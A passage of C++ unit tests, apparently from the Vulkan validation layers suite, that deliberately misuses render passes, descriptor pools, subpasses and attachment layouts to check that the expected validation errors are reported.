shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 0ull, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 1ull, ray_tracing_properties.shaderGroupHandleSize, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 2ull, ray_tracing_properties.shaderGroupHandleSize, shader_binding_table_buffer.handle(), ray_tracing_properties.shaderGroupHandleSize * 3ull, ray_tracing_properties.shaderGroupHandleSize, /*width=*/1, /*height=*/1, /*depth=*/1); ray_tracing_command_buffer.end(); // Update the index of the texture that the shaders should read uint32_t *mapped_storage_buffer_data = (uint32_t *)storage_buffer.memory().map(); mapped_storage_buffer_data[0] = test.rgen_index; mapped_storage_buffer_data[1] = test.ahit_index; mapped_storage_buffer_data[2] = test.chit_index; mapped_storage_buffer_data[3] = test.miss_index; mapped_storage_buffer_data[4] = test.intr_index; mapped_storage_buffer_data[5] = test.call_index; mapped_storage_buffer_data[6] = 0; mapped_storage_buffer_data[7] = 0; mapped_storage_buffer_data[8] = 0; mapped_storage_buffer_data[9] = 0; mapped_storage_buffer_data[10] = 0; mapped_storage_buffer_data[11] = 0; storage_buffer.memory().unmap(); vk::QueueSubmit(ray_tracing_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(ray_tracing_queue); m_errorMonitor->VerifyFound(); mapped_storage_buffer_data = (uint32_t *)storage_buffer.memory().map(); if (i == 1) { ASSERT_TRUE(mapped_storage_buffer_data[6] == 1); ASSERT_TRUE(mapped_storage_buffer_data[7] == 2); ASSERT_TRUE(mapped_storage_buffer_data[8] == 3); ASSERT_TRUE(mapped_storage_buffer_data[9] == 4); ASSERT_TRUE(mapped_storage_buffer_data[10] == 5); ASSERT_TRUE(mapped_storage_buffer_data[11] == 6); } storage_buffer.memory().unmap(); vk::DestroyPipeline(m_device->handle(), pipeline, nullptr); } } } TEST_F(VkLayerTest, InvalidDescriptorPoolConsistency) { VkResult err; TEST_DESCRIPTION("Allocate descriptor sets from one DS pool and attempt to delete them from another."); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-pDescriptorSets-parent"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool bad_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &bad_pool); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); err = vk::FreeDescriptorSets(m_device->device(), bad_pool, 1, &descriptor_set.set_); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), bad_pool, NULL); } TEST_F(VkLayerTest, DrawWithPipelineIncompatibleWithSubpass) { TEST_DESCRIPTION("Use a pipeline for the wrong subpass in a render pass instance"); ASSERT_NO_FATAL_FAILURE(Init()); // A renderpass with two subpasses, both writing the same attachment. VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dep = {0, 1, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_DEPENDENCY_BY_REGION_BIT}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 2, subpasses, 1, &dep}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkImageObj image(m_device); image.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView = image.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &imageView, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddDefaultColorAttachment(); pipe.AddShader(&vs); pipe.AddShader(&fs); VkViewport viewport = {0.0f, 0.0f, 64.0f, 64.0f, 0.0f, 1.0f}; m_viewports.push_back(viewport); pipe.SetViewport(m_viewports); VkRect2D rect = {}; m_scissors.push_back(rect); pipe.SetScissor(m_scissors); const VkPipelineLayoutObj pl(m_device); pipe.CreateVKPipeline(pl.handle(), rp); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{ 0, 0, }, {32, 32}}, 0, nullptr}; // subtest 1: bind in the wrong subpass vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "built for subpass 0 but used in subpass 1"); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); m_errorMonitor->VerifyFound(); vk::CmdEndRenderPass(m_commandBuffer->handle()); // subtest 2: bind in correct subpass, then transition to next subpass vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "built for subpass 0 but used in subpass 1"); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); m_errorMonitor->VerifyFound(); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, ImageBarrierSubpassConflict) { TEST_DESCRIPTION("Check case where subpass index references different image from image barrier"); ASSERT_NO_FATAL_FAILURE(Init()); // Create RP/FB combo where subpass has incorrect index attachment, this is 2nd half of "VUID-vkCmdPipelineBarrier-image-02635" VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; // ref attachment points to wrong attachment index compared to img_barrier below VkAttachmentReference ref = {1, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dep = {0, 0, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_DEPENDENCY_BY_REGION_BIT}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 2, attach, 1, subpasses, 1, &dep}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkImageObj image(m_device); image.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView = image.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkImageObj image2(m_device); image2.InitNoLayout(32, 32, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView imageView2 = image2.targetView(VK_FORMAT_R8G8B8A8_UNORM); // re-use imageView from start of test VkImageView iv_array[2] = {imageView, imageView2}; VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 2, iv_array, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{ 0, 0, }, {32, 32}}, 0, nullptr}; VkImageMemoryBarrier img_barrier = {}; img_barrier.sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER; img_barrier.srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; img_barrier.dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; img_barrier.oldLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; img_barrier.newLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; img_barrier.image = image.handle(); /* barrier references image from attachment index 0 */ img_barrier.srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; img_barrier.dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; img_barrier.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; img_barrier.subresourceRange.baseArrayLayer = 0; img_barrier.subresourceRange.baseMipLevel = 0; img_barrier.subresourceRange.layerCount = 1; img_barrier.subresourceRange.levelCount = 1; m_commandBuffer->begin(); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdPipelineBarrier-image-02635"); vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, VK_DEPENDENCY_BY_REGION_BIT, 0, nullptr, 0, nullptr, 1, &img_barrier); m_errorMonitor->VerifyFound(); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, RenderPassCreateAttachmentIndexOutOfRange) { SetTargetApiVersion(VK_API_VERSION_1_2); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); // There are no attachments, but refer to attachment 0. VkAttachmentReference ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &ref, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr}; // "... must be less than the total number of attachments ..." TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-attachment-00834", "VUID-VkRenderPassCreateInfo2-attachment-03051"); } TEST_F(VkLayerTest, RenderPassCreateAttachmentReadOnlyButCleared) { // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool maintenance2Supported = rp2Supported; // Check for VK_KHR_maintenance2 if (!rp2Supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); maintenance2Supported = true; } ASSERT_NO_FATAL_FAILURE(InitState()); if (m_device->props.apiVersion < VK_API_VERSION_1_1) { maintenance2Supported = true; } VkAttachmentDescription description = {0, VK_FORMAT_D32_SFLOAT_S8_UINT, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0, nullptr}; // VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL but depth cleared TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pAttachments-00836", "VUID-VkRenderPassCreateInfo2-pAttachments-02522"); if (maintenance2Supported) { // VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL but depth cleared depth_stencil_ref.layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pAttachments-01566", nullptr); // VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL but depth cleared depth_stencil_ref.layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassCreateInfo-pAttachments-01567", nullptr); } } TEST_F(VkLayerTest, RenderPassCreateAttachmentMismatchingLayoutsColor) { TEST_DESCRIPTION("Attachment is used simultaneously as two color attachments with different layouts."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference refs[] = { {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_IMAGE_LAYOUT_GENERAL}, }; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 2, refs, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "subpass 0 already uses attachment 0 with a different image layout", "subpass 0 already uses attachment 0 with a different image layout"); } TEST_F(VkLayerTest, RenderPassCreateAttachmentDescriptionInvalidFinalLayout) { TEST_DESCRIPTION("VkAttachmentDescription's finalLayout must not be UNDEFINED or PREINITIALIZED"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME); } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); auto separate_depth_stencil_layouts_features = lvl_init_struct<VkPhysicalDeviceSeparateDepthStencilLayoutsFeaturesKHR>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&separate_depth_stencil_layouts_features); if (vkGetPhysicalDeviceFeatures2KHR) { vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); } else { separate_depth_stencil_layouts_features.separateDepthStencilLayouts = VK_FALSE; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, (vkGetPhysicalDeviceFeatures2KHR) ? &features2 : nullptr)); VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attach_desc.storeOp = VK_ATTACHMENT_STORE_OP_STORE; attach_desc.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attach_desc.stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attach_desc.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attach_desc.finalLayout = VK_IMAGE_LAYOUT_UNDEFINED; VkAttachmentReference attach_ref = {}; attach_ref.attachment = 0; attach_ref.layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; VkSubpassDescription subpass = {}; subpass.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach_ref; VkRenderPassCreateInfo rpci = {}; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; rpci.attachmentCount = 1; rpci.pAttachments = &attach_desc; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-finalLayout-00843", "VUID-VkAttachmentDescription2-finalLayout-03061"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-finalLayout-00843", "VUID-VkAttachmentDescription2-finalLayout-03061"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; auto depth_format = FindSupportedDepthOnlyFormat(gpu()); auto stencil_format = FindSupportedStencilOnlyFormat(gpu()); auto depth_stencil_format = FindSupportedDepthStencilFormat(gpu()); if (separate_depth_stencil_layouts_features.separateDepthStencilLayouts) { attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03286", "VUID-VkAttachmentDescription2-format-03300"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03287", "VUID-VkAttachmentDescription2-format-03301"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; if (depth_stencil_format) { attach_desc.format = depth_stencil_format; if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03302"); } else { attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03288", "VUID-VkAttachmentDescription2-format-03302"); } attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescription2-format-03303"); } else { attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03289", "VUID-VkAttachmentDescription2-format-03303"); } attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (depth_format) { attach_desc.format = depth_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03290", "VUID-VkAttachmentDescription2-format-03304"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03290", "VUID-VkAttachmentDescription2-format-03304"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03291", "VUID-VkAttachmentDescription2-format-03305"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; 